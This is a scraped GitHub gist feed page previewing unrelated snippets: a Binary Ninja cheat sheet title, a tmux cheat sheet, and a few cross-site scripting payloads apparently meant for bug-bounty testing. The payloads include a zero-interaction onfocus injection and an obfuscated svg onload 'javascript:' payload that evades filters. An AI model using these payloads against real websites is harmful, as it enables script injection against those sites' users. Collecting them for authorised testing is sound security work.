Skip to content

Instantly share code, notes, and snippets.

View mmssr's full-sized avatar

beep boop mmssr

View GitHub Profile
@alexander-hanel
alexander-hanel / bn-cheat.md
Last active August 3, 2025 00:22
Cheat Sheet for Binary Ninja
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
# Internet Explorer, Edge
<svg><script>alert(1)<p>
# Firefox
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active September 8, 2025 08:54
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname